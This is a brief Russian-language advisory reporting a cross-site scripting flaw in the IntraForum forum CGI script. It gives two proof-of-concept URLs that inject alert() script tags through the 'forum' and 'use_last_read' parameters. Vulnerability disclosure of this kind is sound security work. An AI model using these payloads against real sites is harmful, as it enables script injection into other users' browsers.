Программа: IntraForum
Уязвимость обнаружена в IntraForum. Удаленный пользователь может выполнить XSS нападение.
Пример:
http://[target]/cgi-bin/forumsdb/intraforum_db.cgi?forum= <script>alert('sda')</script>&read=
&alias=&redir_flag=true
http://[target]/cgi-bin/forumsdb/intraforum_db.cgi?forum= 7940&alias=dbr&read=000965-000964&session=
FFFF&use_last_read="><script>alert('XSS')</script>